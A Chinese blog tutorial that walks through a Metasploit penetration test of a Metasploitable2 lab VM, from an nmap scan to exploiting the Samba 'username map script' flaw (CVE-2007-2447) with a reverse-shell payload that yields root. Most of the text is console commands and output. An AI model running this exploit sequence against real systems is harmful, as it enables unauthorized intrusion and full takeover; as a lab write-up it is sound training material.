分享技术,记录生活,在互联网上留下属于自己的一亩三分地。

Metasploit渗透测试流程

Linux novadmin 1284℃ 0评论

具体Metasploit是什么,这里就不在介绍了。网上一搜一大堆,大概渗透思路有以下几个步骤:

  1. 使用Nmap扫描目标主机,得到主机的漏洞信息
  2. 在msfconsole命令模式下,搜索相关软件模块信息
  3. 使用use命令调度模块
  4. 使用info命令查看模块信息
  5. 选择payload做为攻击
  6. 设置相关参数
  7. 渗透攻击

这次是用metasploitable2做为靶机进行测试,metasploitable2下载地址可以从百度网盘下载

这里我Metasploit主机IP地址是:192.168.1.63/24

Metasploit的靶机地址是:192.168.1.79/24

一、扫描主机得到漏洞信息

启动Metasploit


#msfconsole

因为Nmap和Metasploit已经深度集成了,所以可以直接在msfconsole调用nmap


msf > nmap -sV 192.168.1.79
[*] exec: nmap -sV 192.168.1.79

Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-13 13:43 CST
Nmap scan report for bogon (192.168.1.79)
Host is up (0.00021s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec?
513/tcp  open  login?
514/tcp  open  shell?
1099/tcp open  rmiregistry GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port514-TCP:V=7.70%I=7%D=7/13%Time=5B483C1A%P=i686-pc-linux-gnu%r(NULL,
SF:28,"\x01Host\x20address\x20mismatch\x20for\x20192\.168\.1\.63\n");
MAC Address: 00:0C:29:F2:1C:1D (VMware)
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.09 seconds

可以看出有samba服务,这次以samba服务为例进行测试,139端口,我们还可以看出服务名称和版本号,是叫samba的服务,处于3.X-4.X版本。

二、使用search命令搜索相关漏洞信息:


msf > search samba

Matching Modules
================

   Name                                                 Disclosure Date  Rank       Description
   ----                                                 ---------------  ----       -----------
   auxiliary/admin/smb/samba_symlink_traversal                           normal     Samba Symlink Directory Traversal
   auxiliary/dos/samba/lsa_addprivs_heap                                 normal     Samba lsa_io_privilege_set Heap Overflow
   auxiliary/dos/samba/lsa_transnames_heap                               normal     Samba lsa_io_trans_names Heap Overflow
   auxiliary/dos/samba/read_nttrans_ea_list                              normal     Samba read_nttrans_ea_list Integer Overflow
   auxiliary/scanner/rsync/modules_list                                  normal     List Rsync Modules
   auxiliary/scanner/smb/smb_uninit_cred                                 normal     Samba _netr_ServerPasswordSet Uninitialized Credential State
   exploit/freebsd/samba/trans2open                     2003-04-07       great      Samba trans2open Overflow (*BSD x86)
   exploit/linux/samba/chain_reply                      2010-06-16       good       Samba chain_reply Memory Corruption (Linux x86)
   exploit/linux/samba/is_known_pipename                2017-03-24       excellent  Samba is_known_pipename() Arbitrary Module Load
   exploit/linux/samba/lsa_transnames_heap              2007-05-14       good       Samba lsa_io_trans_names Heap Overflow
   exploit/linux/samba/setinfopolicy_heap               2012-04-10       normal     Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   exploit/linux/samba/trans2open                       2003-04-07       great      Samba trans2open Overflow (Linux x86)
   exploit/multi/samba/nttrans                          2003-04-07       average    Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   exploit/multi/samba/usermap_script                   2007-05-14       excellent  Samba "username map script" Command Execution
   exploit/osx/samba/lsa_transnames_heap                2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   exploit/osx/samba/trans2open                         2003-04-07       great      Samba trans2open Overflow (Mac OS X PPC)
   exploit/solaris/samba/lsa_transnames_heap            2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   exploit/solaris/samba/trans2open                     2003-04-07       great      Samba trans2open Overflow (Solaris SPARC)
   exploit/unix/http/quest_kace_systems_management_rce  2018-05-31       excellent  Quest KACE Systems Management Command Injection
   exploit/unix/misc/distcc_exec                        2002-02-01       excellent  DistCC Daemon Command Execution
   exploit/unix/webapp/citrix_access_gateway_exec       2010-12-21       excellent  Citrix Access Gateway Command Execution
   exploit/windows/fileformat/ms14_060_sandworm         2014-10-14       excellent  MS14-060 Microsoft Windows OLE Package Manager Code Execution
   exploit/windows/http/sambar6_search_results          2003-06-21       normal     Sambar 6 Search Results Buffer Overflow
   exploit/windows/license/calicclnt_getconfig          2005-03-02       average    Computer Associates License Client GETCONFIG Overflow
   exploit/windows/smb/group_policy_startup             2015-01-26       manual     Group Policy Script Execution From Shared Resource
   post/linux/gather/enum_configs                                        normal     Linux Gather Configurations

注意:

Rank表示模块的等级:攻击模块的等级很重要,依次选择excellent和great,其他模块并不是很好或者效果不明显。

这里我们使用下面的模块:


 exploit/multi/samba/usermap_script                   2007-05-14       excellent  Samba "username map script" Command Execution

三、在msfconsole模式下,直接使用use命令


msf > use exploit/multi/samba/usermap_script
msf exploit(multi/samba/usermap_script) > 

 

四、使用info查看模块详细信息


msf exploit(multi/samba/usermap_script) > info

       Name: Samba "username map script" Command Execution
     Module: exploit/multi/samba/usermap_script
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2007-05-14

Provided by:
  jduck <jduck@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST                   yes       The target address
  RPORT  139              yes       The target port (TCP)

Payload information:
  Space: 1024

Description:
  This module exploits a command execution vulnerability in Samba 
  versions 3.0.20 through 3.0.25rc3 when using the non-default 
  "username map script" configuration option. By specifying a username 
  containing shell meta characters, attackers can execute arbitrary 
  commands. No authentication is needed to exploit this vulnerability 
  since this option is used to map usernames prior to authentication!

References:
  https://cvedetails.com/cve/CVE-2007-2447/
  OSVDB (34700)
  http://www.securityfocus.com/bid/23972
  http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
  http://samba.org/samba/security/CVE-2007-2447.html

 

五、选择payload模块


msf exploit(multi/samba/usermap_script) > show payloads

Compatible Payloads
===================

   Name                                Disclosure Date  Rank    Description
   ----                                ---------------  ----    -----------
   cmd/unix/bind_awk                                    normal  Unix Command Shell, Bind TCP (via AWK)
   cmd/unix/bind_inetd                                  normal  Unix Command Shell, Bind TCP (inetd)
   cmd/unix/bind_lua                                    normal  Unix Command Shell, Bind TCP (via Lua)
   cmd/unix/bind_netcat                                 normal  Unix Command Shell, Bind TCP (via netcat)
   cmd/unix/bind_netcat_gaping                          normal  Unix Command Shell, Bind TCP (via netcat -e)
   cmd/unix/bind_netcat_gaping_ipv6                     normal  Unix Command Shell, Bind TCP (via netcat -e) IPv6
   cmd/unix/bind_perl                                   normal  Unix Command Shell, Bind TCP (via Perl)
   cmd/unix/bind_perl_ipv6                              normal  Unix Command Shell, Bind TCP (via perl) IPv6
   cmd/unix/bind_r                                      normal  Unix Command Shell, Bind TCP (via R)
   cmd/unix/bind_ruby                                   normal  Unix Command Shell, Bind TCP (via Ruby)
   cmd/unix/bind_ruby_ipv6                              normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
   cmd/unix/bind_socat_udp                              normal  Unix Command Shell, Bind UDP (via socat)
   cmd/unix/bind_zsh                                    normal  Unix Command Shell, Bind TCP (via Zsh)
   cmd/unix/generic                                     normal  Unix Command, Generic Command Execution
   cmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)
   cmd/unix/reverse_awk                                 normal  Unix Command Shell, Reverse TCP (via AWK)
   cmd/unix/reverse_bash_telnet_ssl                     normal  Unix Command Shell, Reverse TCP SSL (telnet)
   cmd/unix/reverse_ksh                                 normal  Unix Command Shell, Reverse TCP (via Ksh)
   cmd/unix/reverse_lua                                 normal  Unix Command Shell, Reverse TCP (via Lua)
   cmd/unix/reverse_ncat_ssl                            normal  Unix Command Shell, Reverse TCP (via ncat)
   cmd/unix/reverse_netcat                              normal  Unix Command Shell, Reverse TCP (via netcat)
   cmd/unix/reverse_netcat_gaping                       normal  Unix Command Shell, Reverse TCP (via netcat -e)
   cmd/unix/reverse_openssl                             normal  Unix Command Shell, Double Reverse TCP SSL (openssl)
   cmd/unix/reverse_perl                                normal  Unix Command Shell, Reverse TCP (via Perl)
   cmd/unix/reverse_perl_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via perl)
   cmd/unix/reverse_php_ssl                             normal  Unix Command Shell, Reverse TCP SSL (via php)
   cmd/unix/reverse_python                              normal  Unix Command Shell, Reverse TCP (via Python)
   cmd/unix/reverse_python_ssl                          normal  Unix Command Shell, Reverse TCP SSL (via python)
   cmd/unix/reverse_r                                   normal  Unix Command Shell, Reverse TCP (via R)
   cmd/unix/reverse_ruby                                normal  Unix Command Shell, Reverse TCP (via Ruby)
   cmd/unix/reverse_ruby_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via Ruby)
   cmd/unix/reverse_socat_udp                           normal  Unix Command Shell, Reverse UDP (via socat)
   cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)
   cmd/unix/reverse_zsh                                 normal  Unix Command Shell, Reverse TCP (via Zsh)

可以看出这么多payload,具体的可以查询下详细信息

在选择攻击载荷的时候,建议选用和meterpreter和reverse相关的载荷,这次我们使用:


cmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)

使用办法:



msf exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse

如果没有报错,则说明使用成功。

六、这是攻击的使用参数

首先通过show options或者options,查看需要填写的参数:


msf exploit(multi/samba/usermap_script) > options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.63     yes       The listen address (an interface may be specified)
   LPORT  4445             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(multi/samba/usermap_script) > 

其中参数要求yes的信息是必须要设置的参数,上面只有RHOST、RPORT、LHOST、LPORT4个参数是必须的。

RHOST:表示我们的靶机,也就是目标机器的IP地址

RPORT:表示服务端口号

LHOST:是本地的主机IP地址

LPORT:是本地的一个端口号,用来跟靶机建立通道的一个端口。

我们分别设置一下:


msf exploit(multi/samba/usermap_script) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(multi/samba/usermap_script) > set RPORT 139
RPORT => 139
msf exploit(multi/samba/usermap_script) > set LHOST 192.168.1.63
LHOST => 192.168.1.63
msf exploit(multi/samba/usermap_script) > set LPORT 4445
LPORT => 4445

七、渗透开始

有的可以使用check命令,检查是否有设置错误,本次没有check这个命令选项,可以直接exploit或者run命令进行渗透


msf exploit(multi/samba/usermap_script) > check
[*] 192.168.1.79:139 This module does not support check.
msf exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP double handler on 192.168.1.63:4445 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo LqeeGpfjkc61Y8Jw;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "LqeeGpfjkc61Y8Jw\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (192.168.1.63:4445 -> 192.168.1.79:55748) at 2018-07-13 14:03:33 +0800

从显示可以看出来,已经建立了一个连接,可以使用命令查看ip地址和主机名字,权限


msf exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP double handler on 192.168.1.63:4445 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo LqeeGpfjkc61Y8Jw;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "LqeeGpfjkc61Y8Jw\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (192.168.1.63:4445 -> 192.168.1.79:55748) at 2018-07-13 14:03:33 +0800

ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:f2:1c:1d  
          inet addr:192.168.1.79  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fef2:1c1d/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:99250 errors:0 dropped:0 overruns:0 frame:0
          TX packets:28036 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:6968942 (6.6 MB)  TX bytes:2673571 (2.5 MB)
          Interrupt:19 Base address:0x2000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:1624 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1624 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:783809 (765.4 KB)  TX bytes:783809 (765.4 KB)

uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
whoami
root

这样整个一个基础的渗透过程就完成了。

当然是实际的过程中没有这么顺利,我们要考虑是否有防火墙,主机是否经过NAT或者内外网的情况,都是我们需要了解的。渗透过程往往是在信息收集阶段很重要,通过各种各样的渠道得到目标的信息,越多的信息对我们渗透人员越有利。

转载请注明:Nov » Metasploit渗透测试流程

喜欢 (0)or分享 (0)
发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址